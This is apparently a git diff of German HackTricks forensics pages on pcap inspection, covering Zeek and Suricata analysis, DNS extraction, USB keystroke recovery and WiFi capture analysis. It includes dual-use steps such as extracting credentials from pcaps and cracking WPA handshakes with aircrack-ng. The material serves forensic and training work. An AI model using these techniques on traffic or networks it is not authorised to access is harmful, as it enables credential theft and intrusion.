[file-data-carving-recovery-tools.md](../partitions-file-systems-carving/file-data-carving-recovery-tools.md) @@ -105,11 +106,11 @@ Die Verwendung gängiger Carving-Techniken kann nützlich sein, um Dateien und I ### Erfassen von Anmeldedaten -Sie können Tools wie [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) verwenden, um Anmeldedaten aus einem pcap oder einer Live-Schnittstelle zu analysieren. +Sie können Tools wie [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) verwenden, um Anmeldeinformationen aus einem pcap oder einer Live-Schnittstelle zu analysieren.
-[**RootedCON**](https://www.rootedcon.com/) ist die relevanteste Cybersicherheitsveranstaltung in **Spanien** und eine der wichtigsten in **Europa**. Mit **dem Ziel, technisches Wissen zu fördern**, ist dieser Kongress ein brodelnder Treffpunkt für Technologie- und Cybersicherheitsprofis in jeder Disziplin. +[**RootedCON**](https://www.rootedcon.com/) ist das relevanteste Cybersicherheitsereignis in **Spanien** und eines der wichtigsten in **Europa**. Mit **der Mission, technisches Wissen zu fördern**, ist dieser Kongress ein brodelnder Treffpunkt für Technologie- und Cybersicherheitsfachleute in jeder Disziplin. {% embed url="https://www.rootedcon.com/" %} @@ -125,34 +126,16 @@ echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules ``` **Überprüfen Sie die pcap-Datei** - -Um eine pcap-Datei zu überprüfen, können Sie verschiedene Tools verwenden, um den Inhalt zu analysieren und wichtige Informationen zu extrahieren. Hier sind einige Schritte, die Sie befolgen können: - -1. **Wireshark**: Öffnen Sie die pcap-Datei mit Wireshark, einem leistungsstarken Netzwerkanalysetool. Wireshark ermöglicht es Ihnen, den Datenverkehr im Detail zu betrachten, Filter anzuwenden und Protokolle zu analysieren. - -2. **TCPDump**: Verwenden Sie das Befehlszeilentool TCPDump, um den Inhalt der pcap-Datei anzuzeigen. Sie können Filter anwenden, um den Datenverkehr auf bestimmte Protokolle oder IP-Adressen zu beschränken. - -3. **TShark**: TShark ist ein Konsolenprogramm, das Teil von Wireshark ist. Es ermöglicht Ihnen, pcap-Dateien zu analysieren und wichtige Informationen zu extrahieren, ohne die grafische Benutzeroberfläche von Wireshark verwenden zu müssen. - -4. **Zeitstempel überprüfen**: Überprüfen Sie die Zeitstempel in der pcap-Datei, um festzustellen, wann bestimmte Ereignisse stattgefunden haben. Dies kann Ihnen helfen, den Ablauf des Netzwerkverkehrs zu verstehen. - -5. **Filter anwenden**: Verwenden Sie Filter, um den Datenverkehr auf bestimmte Protokolle, IP-Adressen oder Ports zu beschränken. Dies kann Ihnen helfen, den relevanten Teil der pcap-Datei zu isolieren. - -6. **Analyse von Protokollen**: Untersuchen Sie die Protokolle im pcap-Dateiinhalt, um mögliche Angriffe oder verdächtige Aktivitäten zu identifizieren. Achten Sie auf ungewöhnliche Verhaltensweisen oder Anomalien. - -7. **Metadaten überprüfen**: Überprüfen Sie die Metadaten der pcap-Datei, wie z.B. den Ersteller, das Erstellungsdatum und die Dateigröße. Diese Informationen können bei der forensischen Analyse hilfreich sein. - -Durch die Überprüfung der pcap-Datei können Sie wertvolle Informationen über den Netzwerkverkehr gewinnen und möglicherweise Angriffe oder Sicherheitsverletzungen erkennen. ``` suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log ``` ### YaraPcap -[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) ist ein Tool, das Folgendes tut: +[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) ist ein Tool, das -* Liest eine PCAP-Datei und extrahiert HTTP-Streams. -* Entpackt komprimierte Streams mit gzip. -* Durchsucht jede Datei mit Yara. +* Eine PCAP-Datei liest und HTTP-Streams extrahiert. +* Gzip entpackt alle komprimierten Streams. +* Scant jede Datei mit Yara. * Schreibt einen report.txt. * Speichert optional übereinstimmende Dateien in einem Verzeichnis. @@ -166,9 +149,9 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log ## Zeek -> [Zeek](https://docs.zeek.org/en/master/about.html) ist ein passiver, Open-Source-Netzwerkverkehrsanalysator. Viele Betreiber verwenden Zeek als Netzwerksicherheitsmonitor (NSM), um Untersuchungen zu verdächtigen oder bösartigen Aktivitäten zu unterstützen. Zeek unterstützt auch eine Vielzahl von Verkehrsanalyseaufgaben jenseits des Sicherheitsbereichs, einschließlich Leistungsmessung und Fehlerbehebung. +> [Zeek](https://docs.zeek.org/en/master/about.html) ist ein passiver, Open-Source-Netzwerkverkehrsanalysator. Viele Betreiber verwenden Zeek als Network Security Monitor (NSM), um Untersuchungen zu verdächtigen oder bösartigen Aktivitäten zu unterstützen. Zeek unterstützt auch eine Vielzahl von Verkehrsanalyseaufgaben jenseits des Sicherheitsbereichs, einschließlich Leistungsvermessung und Fehlerbehebung. -Grundsätzlich sind die von `zeek` erstellten Protokolle keine **pcaps**. Daher müssen Sie **andere Tools** verwenden, um die Protokolle zu analysieren, in denen sich die **Informationen** über die pcaps befinden. +Grundsätzlich sind die von `zeek` erstellten Protokolle keine **pcaps**. Daher müssen Sie **andere Tools** verwenden, um die Protokolle zu analysieren, in denen sich die **Informationen** zu den pcaps befinden. ### Verbindungsinfo ```bash @@ -221,50 +204,6 @@ Score,Source IP,Destination IP,Connections,Avg Bytes,Intvl Range,Size Range,Top 0.838,10.55.200.10,205.251.194.64,210,69,29398,4,300,70,109,205,0,0,0,0 ``` ### DNS-Informationen - -DNS (Domain Name System) ist ein grundlegender Bestandteil des Internets, der für die Auflösung von Domainnamen in IP-Adressen verantwortlich ist. Bei der Untersuchung von PCAP-Dateien können DNS-Informationen wertvolle Einblicke liefern. Hier sind einige nützliche Techniken, um DNS-Informationen aus PCAP-Dateien zu extrahieren: - -#### DNS-Anfragen und -Antworten filtern - -Verwenden Sie Filter, um nur DNS-Anfragen und -Antworten anzuzeigen. Dies kann Ihnen helfen, den Datenverkehr zu reduzieren und sich auf relevante Informationen zu konzentrieren. - -```bash -tcpdump -r file.pcap 'udp port 53' -``` - -#### DNS-Anfragen analysieren - -Analysieren Sie die DNS-Anfragen, um Informationen über die angeforderten Domains zu erhalten. Dies kann Ihnen helfen, verdächtige Aktivitäten oder ungewöhnliche Muster zu erkennen. - -```bash -tshark -r file.pcap -Y 'dns.flags.response == 0' -T fields -e dns.qry.name -``` - -#### DNS-Antworten analysieren - -Analysieren Sie die DNS-Antworten, um Informationen über die aufgelösten IP-Adressen zu erhalten. Dies kann Ihnen helfen, potenzielle Ziele oder Kommunikationskanäle zu identifizieren. - -```bash -tshark -r file.pcap -Y 'dns.flags.response == 1' -T fields -e dns.a -``` - -#### DNS-Cache analysieren - -Analysieren Sie den DNS-Cache, um Informationen über zuvor aufgelöste Domains zu erhalten. Dies kann Ihnen helfen, historische Aktivitäten zu untersuchen und mögliche Angriffsziele zu identifizieren. - -```bash -tshark -r file.pcap -Y 'dns.flags.response == 1 && dns.flags.rcode == 0' -T fields -e dns.a -e dns.qry.name -``` - -#### DNS-Verkehr visualisieren - -Visualisieren Sie den DNS-Verkehr, um Muster oder Anomalien zu erkennen. Dies kann Ihnen helfen, Zusammenhänge zwischen verschiedenen Domains oder IP-Adressen zu verstehen. - -```bash -tshark -r file.pcap -Y 'dns.flags.response == 1' -T fields -e dns.a -e dns.qry.name | awk '{print $2" "$1}' | sort | uniq -c | sort -nr -``` - -Die Analyse von DNS-Informationen kann bei der forensischen Untersuchung von PCAP-Dateien äußerst nützlich sein, um verdächtige Aktivitäten zu erkennen und mögliche Sicherheitsverletzungen aufzudecken. ```bash #Get info about each DNS request performed cat dns.log | zeek-cut -c id.orig_h query qtype_name answers @@ -281,7 +220,7 @@ cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr #See top DNS domain requested with rita rita show-exploded-dns -H --limit 10 zeek_logs ``` -## Weitere Tricks zur Analyse von PCAP-Dateien +## Weitere pcap-Analysetricks {% content-ref url="dnscat-exfiltration.md" %} [dnscat-exfiltration.md](dnscat-exfiltration.md) @@ -299,20 +238,21 @@ rita show-exploded-dns -H --limit 10 zeek_logs
-[**RootedCON**](https://www.rootedcon.com/) ist die relevanteste Cybersicherheitsveranstaltung in **Spanien** und eine der wichtigsten in **Europa**. Mit **dem Ziel, technisches Wissen zu fördern**, ist dieser Kongress ein brodelnder Treffpunkt für Technologie- und Cybersicherheitsprofis in jeder Disziplin. +[**RootedCON**](https://www.rootedcon.com/) ist das relevanteste Cybersicherheitsereignis in **Spanien** und eines der wichtigsten in **Europa**. Mit **der Mission, technisches Wissen zu fördern**, ist dieser Kongress ein brodelnder Treffpunkt für Technologie- und Cybersicherheitsfachleute in jeder Disziplin. {% embed url="https://www.rootedcon.com/" %} +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichen.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md b/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md index 5fbcaeac1..5028f9c50 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md @@ -1,23 +1,24 @@ +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} Wenn Sie einen pcap einer USB-Verbindung mit vielen Unterbrechungen haben, handelt es sich wahrscheinlich um eine USB-Tastaturverbindung. Ein Wireshark-Filter wie dieser könnte nützlich sein: `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)` -Es könnte wichtig sein zu wissen, dass die Daten, die mit "02" beginnen, mit der Shift-Taste gedrückt werden. +Es könnte wichtig sein zu wissen, dass Daten, die mit "02" beginnen, unter Verwendung von Umschalttaste gedrückt werden. Weitere Informationen und einige Skripte zur Analyse finden Sie unter: @@ -26,16 +27,17 @@ Weitere Informationen und einige Skripte zur Analyse finden Sie unter: +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md b/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md index bae655963..f1484b381 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md @@ -1,43 +1,45 @@ +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} -Wenn Sie eine pcap-Datei haben, die die Kommunikation über USB einer Tastatur enthält, wie die folgende: +Wenn Sie eine pcap-Datei haben, die die Kommunikation über USB einer Tastatur wie der folgenden enthält: ![](<../../../.gitbook/assets/image (613).png>) -Sie können das Tool [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) verwenden, um herauszufinden, was in der Kommunikation geschrieben wurde: +Können Sie das Tool [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) verwenden, um herauszufinden, was in der Kommunikation geschrieben wurde: ```bash tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > keystrokes.txt python3 usbkeyboard.py ./keystrokes.txt ``` -Sie können weitere Informationen lesen und einige Skripte zur Analyse finden unter: +Sie können weitere Informationen lesen und einige Skripte zum Analysieren finden unter: * [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4) * [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) +{% hint style="success" %} +Lernen Sie & üben Sie AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github Repositories einreichen.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md index 0bf9ddec4..ca441d951 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md @@ -1,21 +1,22 @@ +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} -# Überprüfen Sie BSSIDs +# Überprüfen von BSSIDs -Wenn Sie einen Capture erhalten, dessen Hauptverkehr Wifi ist und Sie WireShark verwenden, können Sie alle SSIDs des Captures mit _Wireless --> WLAN Traffic_ untersuchen: +Wenn Sie einen Capture erhalten, dessen Hauptverkehr Wifi mit WireShark ist, können Sie alle SSIDs des Captures mit _Wireless --> WLAN Traffic_ untersuchen: ![](<../../../.gitbook/assets/image (424).png>) @@ -23,25 +24,26 @@ Wenn Sie einen Capture erhalten, dessen Hauptverkehr Wifi ist und Sie WireShark ## Brute Force -Eine der Spalten auf diesem Bildschirm gibt an, ob **eine Authentifizierung im pcap gefunden wurde**. Wenn dies der Fall ist, können Sie versuchen, sie mit `aircrack-ng` zu Brute-Force: +Eine der Spalten dieses Bildschirms gibt an, ob **eine Authentifizierung im pcap gefunden wurde**. In diesem Fall können Sie versuchen, sie mit `aircrack-ng` zu Brute-Forcen: ```bash aircrack-ng -w pwds-file.txt -b file.pcap ``` -Zum Beispiel wird es das WPA-Passwort abrufen, das einen PSK (Pre-Shared Key) schützt, das später zum Entschlüsseln des Datenverkehrs erforderlich sein wird. +```markdown +Zum Beispiel wird es das WPA-Passwort abrufen, das einen PSK (pre-shared key) schützt, das später zum Entschlüsseln des Datenverkehrs erforderlich sein wird. # Daten in Beacons / Side Channel -Wenn Sie vermuten, dass **Daten in den Beacons eines Wifi-Netzwerks durchsickern**, können Sie die Beacons des Netzwerks überprüfen, indem Sie einen Filter wie den folgenden verwenden: `wlan contains ` oder `wlan.ssid == "NAMEdesNETZWERKS"` suchen Sie in den gefilterten Paketen nach verdächtigen Zeichenketten. +Wenn Sie vermuten, dass **Daten in den Beacons eines WLAN-Netzwerks durchsickern**, können Sie die Beacons des Netzwerks mithilfe eines Filters wie dem folgenden überprüfen: `wlan contains ` oder `wlan.ssid == "NAMEdesNETZWERKS"` suchen Sie in den gefilterten Paketen nach verdächtigen Zeichenfolgen. -# Unbekannte MAC-Adressen in einem Wifi-Netzwerk finden +# Unbekannte MAC-Adressen in einem WLAN-Netzwerk finden -Der folgende Link ist nützlich, um die **Geräte zu finden, die Daten in einem Wifi-Netzwerk senden**: +Der folgende Link ist nützlich, um die **Geräte zu finden, die Daten in einem WLAN-Netzwerk senden**: * `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2` Wenn Sie bereits **MAC-Adressen kennen, können Sie sie aus der Ausgabe entfernen**, indem Sie Überprüfungen wie diese hinzufügen: `&& !(wlan.addr==5c:51:88:31:a0:3b)` -Sobald Sie **unbekannte MAC-Adressen** entdeckt haben, die innerhalb des Netzwerks kommunizieren, können Sie **Filter** wie den folgenden verwenden: `wlan.addr== && (ftp || http || ssh || telnet)` um den Datenverkehr zu filtern. Beachten Sie, dass die ftp/http/ssh/telnet-Filter nützlich sind, wenn Sie den Datenverkehr entschlüsselt haben. +Sobald Sie **unbekannte MAC-Adressen** entdeckt haben, die im Netzwerk kommunizieren, können Sie **Filter** wie den folgenden verwenden: `wlan.addr== && (ftp || http || ssh || telnet)` um den Datenverkehr zu filtern. Beachten Sie, dass ftp/http/ssh/telnet-Filter nützlich sind, wenn Sie den Datenverkehr entschlüsselt haben. # Datenverkehr entschlüsseln @@ -49,20 +51,18 @@ Bearbeiten --> Einstellungen --> Protokolle --> IEEE 802.11 --> Bearbeiten ![](<../../../.gitbook/assets/image (426).png>) - - - +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys einreichen.
